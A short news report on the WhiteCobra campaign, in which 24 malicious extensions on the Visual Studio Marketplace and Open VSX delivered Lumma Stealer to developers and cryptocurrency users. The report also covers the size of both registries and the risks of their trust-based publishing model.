Researchers uncovered 24 malicious extensions in Microsoft’s Visual Studio Marketplace and the open source Open VSX Registry, with threat group WhiteCobra targeting developers and cryptocurrency users through malware-laced code.
Open source extension platforms have once again been exploited, with researchers uncovering a major malware campaign that infiltrated both Microsoft’s Visual Studio Marketplace and the open-source Open VSX Registry.
Cybersecurity researchers, along with Ethereum editor Zak Cole, identified 24 malicious extensions across the two registries. The extensions deployed Lumma Stealer, a powerful infostealer capable of extracting passwords, payment data, session cookies, sensitive files, and cryptocurrency wallet details. On Windows systems, Lumma executed directly, while on macOS, a Mach-O binary loaded an unfamiliar malware strain.
The campaign, attributed to a threat actor dubbed WhiteCobra, specifically targeted cryptocurrency holders and software developers. Even after removal, compromised extensions were quickly replaced with new malicious versions, underscoring the scale and persistence of the attack.
The Visual Studio Marketplace, owned by Microsoft, remains one of the most widely used developer platforms, hosting over 48,000 extensions tightly integrated with Visual Studio and VS Code. Meanwhile, the Open VSX Registry, a vendor-neutral and open source alternative, is gaining traction in enterprise environments. It supports VS Code-compatible editors such as Eclipse Theia, Gitpod, and SAP Business Application Studio, hosting around 3000 extensions from more than 1,500 publishers, with over 2 million monthly downloads.
Security experts warn that the trust-based model of open source repositories makes them highly attractive to cybercriminals. The ease of publishing extensions at scale, combined with their central role in developer ecosystems, creates a powerful vector for malware distribution. The repeated replacement of removed malicious extensions highlights the challenge of moderating open-source platforms compared with proprietary markets.
